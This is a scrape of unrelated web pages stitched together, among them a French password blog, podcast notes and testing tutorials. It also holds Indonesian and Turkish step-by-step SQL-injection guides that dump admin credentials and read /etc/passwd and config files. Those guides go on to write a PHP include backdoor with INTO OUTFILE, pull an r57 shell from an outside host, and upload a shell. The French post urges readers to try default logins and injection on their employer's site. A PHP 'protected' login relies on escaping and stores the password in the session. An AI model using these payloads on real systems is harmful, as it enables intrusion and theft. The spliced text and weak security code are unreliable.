Is your website vulnerable to a SQL Injection attack? Has your website been hacked recently?

These are questions you should be asking is you operate or own your own website.

To quote USAToday: Website-infecting SQL injection attacks hit 450,000 a day! What does this mean to you? It means that your website might be a target. Through our independent research we have found SQL injection exploits and XSS vulnerabilities throughout every kind and sort of website. On might say their website is fine because they don’t collect credit card information but that’s simply untrue. There are several reasons why an attacker might hack your website:

1. Profit. An attacker might attack your website in order to gain access to sensitive information such as credit card numbers or personal information which might compromise your clients/visitors identity resulting in identity theft.
2. Defacement. This form of attack is meant to simply take over your website and replace pages with hacked pages. This is a form attack is bragging about hacking ability and typically circulates within the hacking community. You can find out more about these types of hacks at the Hacker Bragging post located at www.zone-h.org.
3. Large Scale. Most of us won’t ever see this form of hack or hack attempt since it’s normally initiated for wide scale profit reasons and typically the focus or larger groups or organizations. The targets are typically large companies with either huge data banks or private/financial records which are either sold on a black market or used to harm large companies and/or their reputations.

The best way to ensure your website is protected is to have a penetration test run. These tests can check for vulnerabilities which a hacker might use in order to gain access to your website of the server your website is hosted on. You may also want to run a full penetration test even if you have a PCI Compliance badge on your website to ensure your client’s safety and security. Most PCI Scans are not heuristic so they are not intended to perform a deep scan.

Secure your website, secure your client information today by scanning your website. Click here.

Dans un monde idéal, je ne passerais pas mes fins de semaine à plier du linge.

Assise sur le divan du salon, entourée de toute part par du linge frais lavé, je plie et empile. Lorsqu’enfin la pile de ma fille est assez haute et risque de s’effondrer, je me lève et me dirige vers sa chambre pour déposer le tout sur son lit.  Sa porte est fermée et un curieux petit “Post-it” jaune attire mon attention. Je cogne en demandant si je peux entrer.

- “Nonnnnnn!  As-tu fait le code?”, me répond-elle de l’autre côté de la porte.

Le code????!!!!!

- “Heu! Non!  Qu’est-ce que c’est que cette histoire de code?”, dis-je.

- “Tu vois le papier sur la porte? Il faut que tu fasses le code pour entrer.” me dit-elle simplement.

Je vois le papier en question. C’est le fameux “Post-it”. Je remarque qu’elle a dessiné un clavier numérique. Je souris et fais semblant de pianoter quelque chose.  Au moment où je m’apprête à entrer, elle me demande :

- “Pis!  C’est quoi le code?”

- “Heu!… (pense vite ma vieille)… 12345.”

- “Non!” répond-elle sèchement.

- “Ben, c’est quoi alors?”

- “Regarde sous le papier. C’est pour ça que c’est un “Post-it”, ça se recolle facilement!”

Pour le côté sécurité, on repassera mais pour le côté pratique, c’est super!  Je soulève le papier, regarde le code et le pianote à nouveau sur le faux clavier.

- “Tu as fait le bon code cette fois?”

- “Oui madame! Est-ce que je peux entrer maintenant?”

- “OK”

Je dépose la pile de linge et retourne au salon, songeuse. Dans le monde où l’on vit, les mots de passe sont devenus un vrai casse-tête.  Il y en a pour tout :

• l’ordinateur au bureau;
• le compte en banque sur internet ou sur paypal;
• le compte Linked In ou autre réseau social;
• l’extranet pour faire notre feuille de temps à distance;
• le nip de notre carte de guichet automatique ou pour la carte de crédit;
• la liste de souhaits sur Amazon;
• … j’en passe et des meilleurs.

Comme l’être humain est paresseux et manque souvent d’imagination, tous les hackers de ce monde savent que nous réutilisons le même mot de passe le plus souvent possible et donc une fois trouvé, ils peuvent faire le tour de notre jardin secret. Pire encore, nous en choisissons un qui soit souvent évident comme notre date de naissance, le nom de nos enfants ou de notre perruche, notre adresse civique ou toute combinaison semblable et surtout facile à craquer.

Pour les cas où ça n’est pas possible (mot de passe imposé au bureau par exemple), rares sont ceux qui se fient à leur mémoire. Il est vrai que retenir un truc du genre “Xs186fGnR5” n’est pas chose facile… alors, on l’écrit. Sur un petit bout de papier caché dans notre tiroir à crayons, sous le sous-main, sous les feuilles accrochées au mur autour de notre bureau, derrière le cadre de photo de famille et même parfois sur un “Post-it” collé sur notre écran.  Pas malin me direz-vous et pourtant, très courant!

Il arrive aussi que, lorsqu’on en a trop, certains les conservent dans un fichier (généralement intitulé “password.txt”!!!) bien en vu sur notre “desktop” ou dans “mes documents”.  On y lie les données sensibles à leur source respective comme un URL ou une étiquette du genre “carte de crédit” facilitant ainsi la tâche aux Vilains. Quand c’est le cas, le mot de passe requis pour ouvrir une session Windows est souvent très banal… malheureusement.

Il y a aussi le cas des programmeurs et des testeurs qui créent des profils fictifs pour tester des applications. On pense alors à :

• username : test1, test2, … ou user,… ou johndoe, ou toto, titi, tata, asdf, etc.
• password : password, test, asdf, toto, titi, tata, 12345, ou même rien du tout (c’est tellement chiant de saisir ces donnés à tous les jours pour tester des systèmes)

Faites un test sur le site de votre employeur et allez dans la zone privée en utilisant ce genre de combinaison. Vous pourriez être surpris des résultats. En plus, les testeurs utilisent souvent des profils ayant un niveau de permission assez élevé car, ils ont besoin de tout tester.

Si ça ne fonctionne pas, ne vous découragez pas et essayez le SQL Injection dont voici un exemple tout simple emprunté à Wikipédia donc grand public :

“… Supposons maintenant que le pirate veuille non pas tromper le script SQL sur le nom d’utilisateur, mais sur le mot de passe. Il pourra alors injecter le code suivant :

* Utilisateur : Dupont
* Mot de passe : ‘ or 1=1–

L’apostrophe indique la fin de la zone de frappe de l’utilisateur, le code “or 1=1” demande au script si 1=1 est vrai, or c’est toujours le cas, et – indique le début d’un commentaire. La requête devient alors :

SELECT uid WHERE name = ‘Dupont’ AND password = ‘ ‘ OR 1=1 — 45723a2af3788c4ff17f8d1114760e62′;

Ainsi le script programmé pour vérifier si ce que l’utilisateur tape est vrai, il verra que 1=1 est vrai, et le pirate sera connecté sous la session Dupont.”

Si ça vous intéresse, lisez également ceci : http://www.linux-pour-lesnuls.com/injection.php On y explique entre autre qu’en changeant le mot de passe par “ ‘ OR 1=1″); drop table users;” ont peut effacer la table des usagers ou pire, on remplace le password par ” ‘; exec master..xp_cmdshell ‘net stop firewall’; – ” et on ouvre littéralement les portes pour tester tous les ports afin de pénétrer dans le système visé.  En passant, les programmeurs ne sont pas plus créatifs pour les noms de table!!!  Essayez ce qui vous paraît le plus évident (comme USERS ou LOGIN) juste pour voir.

C’est également de cette façon que l’on peut inclure des scripts dans une base de données en lançant une commande “Update“. C’est ce qui est arrivé à un endroit où j’étais en mandat. Le problème a été identifié grâce à un internaute qui avait rapporté le fait que son fureteur refusait d’afficher la page du site et présentait plutôt un texte choc l’informant que le site n’était pas sûr.  Belle publicité!  Adieu la crédibilité!

Le problème a été réglé bien entendu mais il a fallu communiquer avec Google qui affichait le message de mise en garde pour lui dire de revisiter notre page pour pouvoir la retirer de sa liste noire.  En tout, le site a été perturbé pendant plus d’une semaine.  Pensez-y!

For Thursday November 19th, and Friday November 20th, we depart from our regular format for those with an advanced understanding of information security technologies.

These two special editions feature technical conversations with newsmakers on new counter measures to fight web drive-by downloads. Part one (this episode) features Pedro Bustamante, Senior Security Researcher with PandaSecurity. Part two will post tomorrow, with an EXCLUSIVE interview with the creators of a new hardware sandbox approach to this vexing security issue.

We will return to our regular format of the latest news on data security, privacy, and the law with Episode 82.  Episode 82 is scheduled to post Sunday night /Monday morning, November 23rd, 2009 at ~12.01am Greenwich Mean Time. That is our regularly scheduled show posting time.

On Episode 80:  InfoSec Conversation with Pedro Bustamante on countering web drive-by downloads.

–> Stream This Special Episode with our Built-In Flash Player:

–> Scroll down to see links and show notes for this week’s show

–> Stream, subscribe or download Episode 80 – Listen or subscribe to the feed to automatically get the latest episode sent to you to your Google, Yahoo, iTunes, or other popular sites.

–>Tune into the show directly on iTunes, you can also subscribe to the program on iTunes.

–> A simple way to listen to the show from with stricter firewalls: Listen from Odeo. This site works better if you are behind a more restrictive enterprise firewall.

Please visit our sponsors, and be sure to let them know you heard about them on The Data Security Podcast:

• Vipre Anti-Virus, the complete Antimalware solution by Sunbelt Software. If you TRY the enterprise version, you get the home version forFREE! Go to: http://www.testdrivevipre.com .

• GamaSec Web App Scans: Spots cyber-hazards on your web site, and has advanced zero-day protection. GET YOUR FREE BASIC WEB APP SCAN, plus a special offer just for listeners to The Data Security Podcast. Go here to sign up, and add the offer code: Podcast.

• SonicWall;  Get the super fast UTM firewall that’s rated Five Stars (the Best rating) by Secure Computing Magazine.  Data Clone Labs is the premier SonicWall Medallion Partner for all your security needs.

• DeviceLock; Software that controls, manages and helps encrypt USB drives and other removable media. Get a free trial on their site, and be sure to let them know you heard about them on The Data Security Podcast.

Show Notes for Episode 80 of the Data Security Podcast

Ira has an extended, technical conversation with Pedro Bustamante, Senior Security Researcher with PandaSecurity. Ira and Pedro will discuss web drive-by downloads. Here is the link that Pedro mentions in the segment.

—->>> 1
Kita tetapkan target terlebih dahulu
contoh: [site]/news_Event/newsDetail.php?ID=2

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada vuln.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2′

—->>> 2
mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : +order+by+

contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1–

sekarang cek secara satu per satu
contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1–
[site]/news_Event/newsDetail.php?ID=-2+order+by+2–
[site]/news_Event/newsDetail.php?ID=-2+order+by+3–
[site]/news_Event/newsDetail.php?ID=-2+order+by+4–

sehingga muncul error atau hilang pesan error…
misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5–

berarti yang kita ambil adalah sampai angka 4
menjadi
[site]/news_Event/newsDetail.php?ID=-2+union+select+4–

—>>> 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
[site]/news_Event/newsDetail.php?ID=-2+order+by+4–

ok ,yg keluar angka 2
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4–

lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema

—>>> 4
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()– -> dimasukan setelah angka terakhir

contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()–

seumpama yg kita cari adalah “admin”

—>>> 5
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa–

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :

http://tools.vyc0d.com/converter/

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0×61646d696e–

—>>> 6
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0×3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0×3a,hasil isi column),3,4+from+(nama table berasal)–

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0×3a,Name,0×3a,password),3,4+from+admin–

Nah dah nemu ID dan password-nya sekarang

ket: 0×3a sama dengan : >> 7
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY……..

Untuk lebih lengkapX dunlut video-nya di http://www.4shared.com/file/106354474/2e7d11e2/SQLi_Backdooring_by_vyc0d.html

pass : israelserverisdown

————-
Wassalam

vYc0d

_________________
Talk less…Code more!!!

source : http://forum.hackers-center.org/viewtopic.php?f=9&t=2517

With the ability to add extensions, Mozilla Firefox is one of the most flexible browsers around. Today, we’ll be discussing HackBar, one of the many add-ons available for Firefox.

First things first, you can get HackBar from Mozilla’s site directly, through this link: https://addons.mozilla.org/en-US/firefox/addon/3899

What does HackBar do? Well, the main purpose of HackBar is to provide you with an easy interface to test out SQL injection techniques. HackBar provides many shortcuts such as converting strings into their CHAR() equivalents in MySQL, one-click encrypting to MD5, SHA-1, SHA-256 and ROT13, encoding and decoding of URLs, etc.

I’ve found the encoding and decoding of URLs to be especially useful. Some addresses are URL encoded, and it makes it hard to decipher the exact content. With HackBar, you can click the ‘Load URL’ button to load the current URL into HackBar’s text box, then click URL decode to decode the URL and give you the address in plain text.

Another useful feature is the MySQL union select statement. It’s a one-click solution that gives you the union select for as many columns as you specify. Definitely a real time-saver when there are lots of columns, as you no longer need to type every single one manually.

For those who are interested in security audits, HackBar is one tool that you want to have.

Microsoft Tuesday for November was lighter than previous months on average, especially compared to October 2009, which ended up with 13 bulletins and 34 vulnerabilities disclosed.  Several bulletins were disclosed for both client and server side vulnerabilities.  There were three critical bulletins with five vulnerabilities and another three important bulletins with 10 vulnerabilities, bringing the total to six bulletins and 15 vulnerabilities. 

Our DVLabs security research team released coverage for all of the bulletins on November 11th moments after the bulletins were disclosed by Microsoft. Our own Cody Pierce is credited with disclosing a critical flaw in the License Logging service.  In addition, our Zero Day Initiative program is credited for responsibly disclosing two important vulnerabilities to Microsoft this month.

• Microsoft Security Bulletin Summary for November 2009 http://www.microsoft.com/technet/security/bulletin/ms09-nov.mspx
• TippingPoint ThreatLinQ Blog (login required)  http://threatlinq.tippingpoint.com/blog/?p=1393
• TippingPoint DVLabs Security Research Team Advisory TPTI-09-07  http://dvlabs.tippingpoint.com/advisory/TPTI-09-07
• Zero Day Initiative Advisory ZDI-09-082                                          http://www.zerodayinitiative.com/advisories/ZDI-09-082/
• Zero Day Initiative Advisory ZDI-09-083                                          http://www.zerodayinitiative.com/advisories/ZDI-09-083/

Overall, this month in the security world saw an average number of critical vulnerabilities disclosed by various vendors:

• Oracle disclosed 38 vulnerabilities this month ranging from remote command execution vulnerabilities, denial of service issues, information disclosure vulnerabilities, SQL injection vulnerabilities, security restrictions bypass issues, and certain data manipulation errors.
• Adobe disclosed five vulnerabilities for memory corruption errors, improper usage of invalid pointers and invalid index.
• Sun disclosed 21 vulnerabilities in the Java Runtime Environment for arbitrary code execution issues, as well as denial-of-service and security restriction bypass flaws.
• Mozilla disclosed 10 vulnerabilities in Firefox and SeaMonkey for flaws resulting in a security restriction bypass, sensitive information access and arbitrary code execution.
• Opera disclosed two vulnerabilities in their popular Web browser for flaws resulting in a security restriction bypass, sensitive information access and arbitrary code execution.

Stay tuned for an update next month on Microsoft Tuesday and the state of vulnerability disclosures.

S.a Arkadaşlar

Bugun sizl3rl3 son g3lişm3l3r ışığında sql İnj3ction (Mysql) konusunu 3l3 alacağız. Bu günl3rd3 vid3o olarak fazla mat3ryali bulunsa da makal3 ş3kliyl3 y3t3rinc3 d3ğinilm3miş olduğunu fark 3ttim v3 bu anlatımı yapmak ist3dim. İç3rik olarak biraz uzun bir yazı olabilir ancak birçok kişiy3 faydalı olacağı kanaatind3yim.

sql İnj3ction n3dir ?
sql Inj3ction k3lim3 manasıyla da anlaşılabil3c3ği gibi sql sorgularının arasına dışarıdan zararlı v3ri 3kl3m3 işl3min3 v3ril3n isimdir. Dinamik w3b uygulamalarında bir v3ritabanı v3 o v3ritabanı üz3rind3 çalışan sql sorguları vardır. Bu sorgular masum amaçlı bir v3ya bird3n fazla tablodan v3ril3r ç3k3r3k 3tkil3şimi sağlamayı amaçlamaktadır. Ama dışarıdaki kullanıcının uygulamaya g3l3n girdil3r3 zararlı v3ri karıştırması sonucu masum sorgularımız korkunç bir faciaya s3b3p olurlar.

Mysql N3dir N3 iş3 Yarar?
Mysql şu anda int3rn3tt3ki 3n popül3r açık kaynak kodlu v3ritabanı yazılımıdır. Tüm v3ril3ri t3k bir ambara yığmak y3rin3 farklı tablolarda v3 v3ritabanlarında düz3nli bir biçimd3 saklamaya yarayan d3polama alanıdır.

sql İnj3ction Bulmada kullanılan G3r3çl3r N3l3rdir ?
sql inj3ction w3b sit3l3ri üz3rind3 3xplor3r vb. w3b tarayacılar kullanılarak bulunabildiği gibi ç3şitli programlama dill3ri il3 yazılmış (p3rl, python, C++, d3lphi vs.) hazır programlarla da bulunabilinir.

N3r3l3rd3 Aranır ?
İd d3ğişk3nl3rin bulunduğu bölg3l3rd3
Arama sayfalarında
Admin v3 us3r giriş pan3ll3rind3
Zayıf s3o uygulamalarında
G3t v3 post m3thodu kullanılmış sayfalarda

injectionda Ençok Kullanılan Komutlar Nelerdir ?
Union all select kolon sayısı veya union select kolon sayısı (verileri çekmede kullanılır)
Group_concat() (Tablo isimlerini tek seferde toplu olarak çekmede kullanılır)
Concat() (Tablo isimlerini tek tek çekmede kullanılır)
Load_file() (/etc/passwd ve diğer site dosyalarını okumada kullanılır)
İnto outfile ( Siteye dışarıdan dosya yüklemede kullanılır)
İnto dumpfile ( Siteye dışarıdan dosya yüklemede kullanılır)
İnformation_schema.schemata (Veritabanlarının adını görmek için kullanılır)
İnformation_schema.schema (Veritabanının adını görmek için kullanılır)
İnformation_schema.tables (Veritabanındaki tablo isimlerini görmek için kullanılır)
İnformation_schema.columns (Veritabanındaki tabloların içindeki kolonların isimlerini görmek için kullanılır)
Limit 1,1 (Veritabanı, tablo ve kolonlarını sırasıyla listelemek için kullanılır)
Like % aranacak kelime % ( Tablo içinde arama yapmaya yarar)
Char() (magic_quotes in açık olduğu ve tırnak kabul etmediği zamanlarda kullanılır)
Unhex ve Hex (magic_quotes in açık olduğu ve tırnak kabul etmediği zamanlarda kullanılır)

İnjectiona başlangıç :
Öncelikle site açığı bulabilmek için google veya benzeri bir arama motorundan çeşitli parametreler girerek istediğimiz gibi bir site buluyoruz.

Örneğin googleye girip arama kısmına “inurl:article.php?id=” giriyoruz. Karşımıza çıkan sayfalardan birine girelim.

www.hedefsite.com/article.php?id=15

Girdiğimiz sitenin adresi bu şekilde olduğunu farz ediyorum ve devam ediyoruz. Bu sayfada sql açığı olup olmadığını birkaç şekilde anlamamız mümkün.

1.) Sayfanın en sonuna ‘a (tırnak işareti veya yanında bir harf) yaparak sayfaya hata verdirtmeye çalışırız. Magic_quotes açıksa sayfada hata almazsınız.
Not: PHP 6.0’dan itibaren magic_quotes kullanılmayacak

2.) And 1=1 ve and 1=0 sıfır kullanarak sayfada bir değişiklik olup olmadığını gözlemlersiniz. Eğer sayfanın şekli değişirse muhtemelen açık vardır.

Biz burada 2. şıkkı deneyerek devam edelim.

www.hedefsite.com/article.php?id=15 and 1=0 sayfa hata veriri yada içeriği yok olur.
www.hedefsite.com/article.php?id=15 and 1=1 sayfa olması gerektiği gibi çıkar.

Evet sitede sql açığı var. Şimdi sql açığını uygulamadan önce kolon sayısını tutturmamız gerekiyor. Bunun için; “group by rakam” veya “order by rakam” ifadelerini kullanarak kolon sayılarını bulalım.

Burada yapmamız gereken olay şudur. Hata veren sayfa ile hata vermeyen sayfanın tam yerini tespit etmek. Örneğin group by 15 yaptığınızda hata yokken group by 16 yaptığınızda hata varsa kolon sayımız 15 dir. Hata veren sayının bir öncesi kolon sayımızı verir..

www.hedefsite.com/article.php?id=15 group by 20– Hata verdi veya sayfa görünümü bozuldu
www.hedefsite.com/article.php?id=15 group by 12– Hata devam ediyor www.hedefsite.com/article.php?id=15 group by 3– Sayfa Normal Çıktı
www.hedefsite.com/article.php?id=15 group by 5– Sayfa Hata verdi
www.hedefsite.com/article.php?id=15 group by 4– Sayfa Normal Çıktı

Kolon sayımız : 4

www.hedefsite.com/article.php?id=15+union+select+1,2,3,4–

Son kısımda kullandığım işaret (–) sonlandırma işaretidir. Bazen o işareti koyduğunuzda hata alırsınız bazen koymadığınız zaman. Sitenin durumuna göre koyup koymamak size kalmış.

Materyaller :
Union: Birden fazla sayıdaki tablolardan veri çekmeye yarayan bir sql operatörüdür.
Select : Tablolardaki alanları listelemek için kullanılan komuttur.
Where: Veriler arasında çeşitli kriterlere göre sorgu yapma yarar

www.hedefsite.com/article.php?id=15+union+select+1,2,3,4–

Yukarıdaki şekilde yazdığınızda sayfa görünür hale gelir. Ancak bizim istediğimiz girdiğimiz kolon sayılarının ekrana yansımasıdır. Bunu sağlamak için sitede olmayan bir id numarası girmeliyiz veya id değişkenin önüne – işareti koyarak istediğimiz sayfa şekline ulaşırız..

www.hedefsite.com/article.php?id=-15+union+select+1,2,3,4–

Yukarıdaki şekli elde ettikten sonra ekrana yansıyan rakamlar yerine sql sorguları yaparak hedefimize ulaşmaya çalışırız.

Mysqlin genelde 2 çeşit versiyonu kullanılır. 4 versiyonu ve 5 versiyonu Bunlar birbirinden oldukça farklıdır diyebiliriz. 4 versiyonlar da tablo ve kolonlar deneme yanılma yöntemi ile bulunabilirken 5 versiyonun da sql sorgularıyla tüm bilgilere ulaşabiliriz.

Mysql de verilerin depolandığı sistem tabloları mevcuttur. Bunların içinde en çok kullandığımız information_schema ile başlayan ve schemata, schema, tables , columns vs gibi alt değerleri içinde barındıran sistem tablosudur.

Bizim sitemizdeki mysqlin 5 versiyonu olsun ve devam edelim..

Site sayfasında 2 – 4 ve 8 görünüyor olsun ve biz 2 rakamının yerine sql kodlarımızı yazalım.

www.hedefsite.com/article.php?id=-15+union+select+1,group_concat(table_name),3,4 +from+information_schema.tables–

Bu girmiş olduğumuz istekle veritabanındaki tabloları group_concat kullanarak toplu olarak göstermesini istiyoruz. Karşımıza veritabanındaki tablolar çıkar ancak sistem tablolarıda çıkmıştır. Onların görünmemesi için;

www.hedefsite.com/article.php?id=-15+union+select+1,group_concat(table_name),3,4+from+information_schema.tables +where+table_schema=database()–

giriyoruz. Böylece sitenin veritabanındaki site ile ilgili tablolara ulaşırız. Bu tabloların içinden bumlamamız gereken tablo admin yada kullanıcıların kaydedildiği tablo adıdır.
Admin – users – siteadmin – settings – adminuser vb isimlerde olabilir.

Bizim sitemizde adminuser çıksın ve onun üzerinden işleme devam edelim.

www.hedefsite.com/article.php?id=-15+union+select+1,group_concat(column_name),3,4+from+information_schema.columns +where+table_name=’adminuser’–

Bu yukarıda girdiğimiz sorguyla adminuser tablosundaki kolonları göster demiş oluyoruz.. Eğer sayfa hata verir ve bize bir şey göstermiyorsa sebebi adminuser tablosunun iki tarafına koyduğumuz tırnak işaretindendir. Böyle durumlarda adminuseri char() fonksiyonunu kullanarak çevirmeli ve tırnaklardan kurtulmalıyız.

Tablo isimlerini char() a çevirmek için http://www.easycalculation.com/ascii-hex.php sitesinden faydalanabilirsiniz..

www.hedefsite.com/article.php?id=-15+union+select+1,group_concat(column_name),3,4+from+information_schema.columns +where+table_name=CHAR(97,100,109,105,110,117,115,101,114)–

Evet sitemizde adminuser tablosunun içindeki kolon isimleri çıkmış olmalı..
İd – username – password – mail vb. şekillerde..

Şimdi sorgumuzu bu elde etmiş olduğumuz bilgileri kullanarak değiştirip gerekli kullanıcı adı ve şifrelerini elde edelim.

www.hedefsite.com/article.php?id=-15+union+select+1,group_concat(id,0×3a,username,0×3a,password,0×3a,mail),3,4+from+adminuser–

Burada kullandığımız 0×3a hex stringi olup açılımı : (iki nokta üst üste) demektir.

Bu şekliyle kullanıcı ve şifreleri toplu halde görünür. Dilerseniz tek tek id numaralarına görede bakabilirsiniz.

www.hedefsite.com/article.php?id=-15+union+select+1,concat(id,0×3a,username,0×3a,password,0×3a,mail),3,4+from+adminuser+where+id=1–

Bu yaptığımız işlemler sonucunda sayfaya yansıyan kullanıcı adı ve şifrelerini kullanarak siteye admin girişi yapmamız mümkündür.

Diğer Fonksiyonlara Örnekler:

Local File Inclusion : Dosya dahil etme anlamına gelir. Serverdeki dosyaları bu açıkla oyuyabiliriz

Kullanımı :

www.hedefsite.com/article.php?id=-15+union+select+1,load_file(‘/etc/passwd’),3,4,5,6,7,8,9,10,11,12,13,14,15–

Sonuç :
root:x:0:0:root:/root:/bin/tcsh
hacksever:x:1:1:hacksever:/usr/sbin:/bin/sh
deneme:x:2:2:deneme:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

Şeklinde serverdeki kullanıcı isimleri ve yetkilerine ulaşılabiliriz.

Yada

www.hedefsite.com/article.php?id=-15+union+select+1,load_file(‘/home/hedefsite/public_html/config.php’),3,4–

Sonuç:

$host = “localhost”;
$k_adi = “hacksever”;
$sifre = “1111122222″;
$db = “hack_db”;

Server yolunu ve dosyasını göstererek php dosyası içindeki kodları ekrana yansıtarak mysql bağlantı bilgilerine ulaşabiliriz.

Kodun çalışmaması durumlarda server uzantısının tamamı hex e çevrilip tırnak işaretlerinden kurtulmak gereklidir.

/etc/passwd in hexe dönüşmüş hali :

www.hedefsite.com/article.php?id=-15+union+select+1,load_file(0×2f6574632f706173737764),3,4–

İnto+outfile ve into dumpfile:
Dışarıdan dosya dahil etmeye yarar. Server uzantısı bilinen sitede güvenlik açığı oluşturacak bir dosya dahil edilip shell kullanarak siteye girmek için kullanılabilinir.

Kullanımı :

www.hedefsite.com/article.php?id=-15+union+select+1,’ <?include($_GET["abc"]);?>’,3,4+from+information_schema.tables +into+outfile+’/home/hedefsite/public_html/hack.php–

Sitede hack.php adında içinde <?include($_GET["abc"]);?> diye bir php kodu bulunan bir dosya oluşturmuş olduk.

Sonuç:

www.hedefsite.com/back.php?abc=http://shellsiteniz.com/r57.txt?

Yukarıdaki şekilde yazdığınızda sitenin serverine girmiş olursunuz.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the MySQL database of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

So to make a secure database query we should use some prevention. Usually, MySQL escape string and add- slash is to very common technique used for MySQL database. Here is a very simple login code with SQL injection protection.

<?php
function safe($value)
{
   include('conn.php');
   $value = addslashes($value);
   return mysql_real_escape_string($value);
}
$username = safe($_POST['username']);
$password = safe($_POST['password']);
$submit = $_POST['submit'];
if(isset($submit))
{
	if($username == "")
	{
		$messageName = "Please Enter an User Name";
	}
	else if($password == "")
	{
		$messageName = "Please Enter an Password";
	}
	else
	{
		$sql="SELECT * FROM user WHERE email='$username' and password ='$password'";
		$result=mysql_query($sql);
		$count=mysql_num_rows($result);
		if($count==1)
			{
				session_start();
				$_SESSION['myusername'] = $username  ;
				$_SESSION['mypassword'] = $password ;
				header("location:home.php");
			}
		else
			{
				$messageName = "Wrong Username or Password";
			}
	}
}
?>

In this file we are getting two post variables User Name and Password. So after getting them we are just simply calling Safe() function. Inside the safe function, first we are adding slash with it using addslash() function. (This is a PHP built in function). After that we are calling mysql_real_escape_string() function. mysql_real_escape_string() calls MySQL’s library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ‘, ” and \x1a.

This function is used to make data safe before sending a query to MySQL. Lastly, we have used a conn.php file to configure the database connection. Inside the conn.php file we will add database name, host name, user name and password to make a database connection. Here is a example of conn.php file:

<?php
$db_name = "test";
$conn = @mysql_connect("localhost", "root", "")
or die("Couldn't connect.");
$db = @mysql_select_db($db_name, $conn) or die("Couldn't select database.");
?>

Boundary value analysis and Equivalence partitioning, explained with simple example:

Boundary value analysis and equivalence partitioning both are test case design strategies in black box testing.

Equivalence Partitioning:

In this method the input domain data is divided into different equivalence data classes. This method is typically used to reduce the total number of test cases to a finite set of testable test cases, still covering maximum requirements.

In short it is the process of taking all possible test cases and placing them into classes. One test value is picked from each class while testing.

E.g.: If you are testing for an input box accepting numbers from 1 to 1000 then there is no use in writing thousand test cases for all 1000 valid input numbers plus other test cases for invalid data.

Using equivalence partitioning method above test cases can be divided into three sets of input data called as classes. Each test case is a representative of respective class.

So in above example we can divide our test cases into three equivalence classes of some valid and invalid inputs.

Test cases for input box accepting numbers between 1 and 1000 using Equivalence Partitioning:
1) One input data class with all valid inputs. Pick a single value from range 1 to 1000 as a valid test case. If you select other values between 1 and 1000 then result is going to be same. So one test case for valid input data should be sufficient.

2) Input data class with all values below lower limit. I.e. any value below 1, as a invalid input data test case.

3) Input data with any value greater than 1000 to represent third invalid input class.

So using equivalence partitioning you have categorized all possible test cases into three classes. Test cases with other values from any class should give you the same result.

We have selected one representative from every input class to design our test cases. Test case values are selected in such a way that largest number of attributes of equivalence class can be exercised.

Equivalence partitioning uses fewest test cases to cover maximum requirements.

Boundary value analysis:

It’s widely recognized that input values at the extreme ends of input domain cause more errors in system. More application errors occur at the boundaries of input domain. ‘Boundary value analysis’ testing technique is used to identify errors at boundaries rather than finding those exist in center of input domain.

Boundary value analysis is a next part of Equivalence partitioning for designing test cases where test cases are selected at the edges of the equivalence classes.

Test cases for input box accepting numbers between 1 and 1000 using Boundary value analysis:
1) Test cases with test data exactly as the input boundaries of input domain i.e. values 1 and 1000 in our case.

2) Test data with values just below the extreme edges of input domains i.e. values 0 and 999.

3) Test data with values just above the extreme edges of input domain i.e. values 2 and 1001.

Boundary value analysis is often called as a part of stress and negative testing.

Note: There is no hard-and-fast rule to test only one value from each equivalence class you created for input domains. You can select multiple valid and invalid values from each equivalence class according to your needs and previous judgments.

E.g. if you divided 1 to 1000 input values in valid data equivalence class, then you can select test case values like: 1, 11, 100, 950 etc. Same case for other test cases having invalid data classes.

This should be a very basic and simple example to understand the Boundary value analysis and Equivalence partitioning concept.

Do you know “Most of the bugs in software are due to incomplete or inaccurate functional requirements?” The software code, doesn’t matter how well it’s written, can’t do anything if there are ambiguities in requirements.

It’s better to catch the requirement ambiguities and fix them in early development life cycle. Cost of fixing the bug after completion of development or product release is too high.  So it’s important to have requirement analysis and catch these incorrect requirements before design specifications and project implementation phases of SDLC.

How to measure functional software requirement specification (SRS) documents?
